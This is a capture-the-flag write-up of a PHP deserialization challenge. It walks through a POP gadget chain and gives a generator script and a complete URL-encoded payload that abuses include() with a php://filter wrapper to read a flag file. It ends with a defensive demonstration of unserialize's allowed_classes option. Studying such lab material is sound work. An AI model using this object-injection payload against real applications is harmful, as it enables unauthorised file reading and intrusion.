BMZCTF simple_pop
2022-07-03 04:15:00 【Listen to the snowflakes flying outside】
simple_pop
Open the challenge to get the source code.

This step tests PHP pseudo-protocols (stream wrappers); we need to read useless.php.

Decode the result to get the source code:
```php
<?php
class Modifier {
    protected $var;
    public function append($value){
        include($value);//flag.php
    }
    // Runs when the object is called like a function
    public function __invoke(){
        $this->append($this->var);
    }
}
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    // Runs when the object is used as a string
    public function __toString(){
        return $this->str->source;
    }
    // Runs automatically during unserialize()
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    // Runs when an inaccessible or undefined property is read
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
if(isset($_GET['password'])){
    // User-controlled input is passed straight to unserialize()
    @unserialize($_GET['password']);
}
else{
    $a=new Show;
}
?>
```
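The POP chain goes through the Show class's __toString, which triggers the Test class's __get, which finally calls Modifier's __invoke to get the flag. The entry point is Show's __wakeup: it passes $this->source to preg_match, so when source is itself a Show object it is converted to a string and __toString runs.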
```php
<?php
class Modifier
{
    protected $var = 'php://filter/convert.base64_encode/resource=/flag';
}
class Show
{
    public $source;
    public $str;
}
class Test
{
    public $p;
}
$m = new Modifier();
$s = new Show();
$t = new Test();
$s -> source = $s;
$s -> str = $t;
$t -> p = $m;
echo urlencode(serialize($s));
```
Construct the payload:
?password=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A49%3A%22php%3A%2F%2Ffilter%2Fconvert.base64_encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D

Decode the output to get the flag.
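From the defender's side, the chain above only works because `unserialize()` is allowed to instantiate application classes from request data. The following is an added example, not code from the original writeup or the challenge: the stand-in classes log which magic methods fire instead of calling `include()`, and the `$fired` log, the `replay()` helper and the `CONSTRUCTED` value are assumptions made for the demo. It replays the same object graph with default options and with `allowed_classes` set to `false`.

```php
<?php
// Stand-ins for the challenge classes: same magic methods, but they append
// to $fired instead of calling include(). All values here are constructed.
$fired = [];

class Modifier {
    protected $var = 'CONSTRUCTED';
    public function __invoke() {
        global $fired;
        $fired[] = "Modifier::__invoke({$this->var})"; // include() would run here
    }
}
class Show {
    public $source;
    public $str;
    public function __toString() {
        global $fired;
        $fired[] = 'Show::__toString';
        return (string) $this->str->source;
    }
    public function __wakeup() {
        // Same filter as the challenge; matching coerces $source to a string.
        preg_match('/gopher|http|file|ftp|https|dict|\.\./i', $this->source);
    }
}
class Test {
    public $p;
    public function __get($key) {
        global $fired;
        $fired[] = 'Test::__get';
        $function = $this->p;
        return $function();
    }
}

// Hypothetical helper: unserialize $blob with $options and report what ran.
function replay(string $blob, array $options): string {
    global $fired;
    $fired = [];
    $obj = unserialize($blob, $options);
    return get_class($obj) . ' <- ' . (implode(' -> ', $fired) ?: 'no magic methods ran');
}

// Same object graph as the writeup's generator script.
$s = new Show(); $s->source = $s; $s->str = new Test(); $s->str->p = new Modifier();
$blob = serialize($s);

echo "default:         ", replay($blob, []), PHP_EOL;
echo "allowed_classes: ", replay($blob, ['allowed_classes' => false]), PHP_EOL;
```

With `allowed_classes` set to `false`, every object in the input becomes a `__PHP_Incomplete_Class`, so `__wakeup` never runs and the chain has no entry point. For data that comes from a query parameter, a format that cannot instantiate objects, such as JSON via `json_decode()`, removes this class of bug entirely.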
